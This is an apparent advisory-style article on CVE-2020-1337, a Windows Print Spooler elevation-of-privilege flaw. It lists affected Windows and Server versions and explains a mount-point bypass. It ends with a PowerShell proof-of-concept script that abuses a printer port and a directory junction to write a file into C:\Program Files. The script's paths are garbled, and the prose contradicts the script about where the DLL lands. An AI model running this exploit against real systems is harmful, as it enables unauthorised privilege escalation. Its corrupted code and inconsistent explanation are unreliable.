A New Dangerous Microsoft Windows Print Spooler Vulnerability

Both Microsoft Windows and Microsoft Windows Server are products of Microsoft Corporation.

Thursday, November 12, 2020, 10:19 GMT

Microsoft Windows is an operating system for personal devices. Microsoft Windows Server is a set of server operating systems. Windows Print Spooler is one of the print spoolers.

An elevation of privilege vulnerability exists in Microsoft Windows Print Spooler. Attackers can use a specially crafted application to exploit this vulnerability to run arbitrary code with elevated privileges.

The following products and versions are affected: Microsoft Windows 7 SP1, Windows 8.1, Windows RT 8.1, Windows 10, Windows Server 2008 SP2, Windows Server 2008 R2 SP1, Windows Server 2012, Windows Server 2012 R2, Windows Server 2016, Windows Server 2019, Windows 10 version 1607, Windows 10 version 1709, Windows 10 version 1803, Windows 10 version 1809,

Windows 10 version 1903, Windows 10 version 1909, Windows 10 2004 version, Windows Server 1903 version, Windows Server 1909 version, Windows Server 2004 version.

Details:

Windows: Local CVE-2020-1337 Bypass Spooler

One way to exploit this on Windows 10 2004 is to realize that if the new path after the mount point is not under the server’s root directory, FileNormalizedNameInformation would crash. The admin$ share, for instance, points to c:\windows.

If the mount point is set to write to c:\Program Files, the mechanism of normalization fails and the original string is restored. This helps you to write outside the windows directory somewhere by putting a mount point anywhere as demanded by system32. The following script, for example, would write a DLL to the root of program data.

mkdir \"C:\\windows\\system32\  asks\  est\"
Add-PrinterDriver -Name \"Generic / Text Only\" 
Add-PrinterPort -Name \"\\\\localhost\\admin$\\system32\  asks\  est\  est.dll\" 
Add-Printer -Name \"PrinterExploit\" -DriverName \"Generic / Text Only\" -PortName \"\\\\localhost\\admin$\\system32\  asks\  est\  est.dll\"
rmdir \"C:\\windows\\system32\  asks\  est\"
New-Item -ItemType Junction -Path \"C:\\windows\\system32\  asks\  est\" -Value \"C:\\Program Files\"
\"TESTTEST\" | Out-Printer -Name \"PrinterExploit\"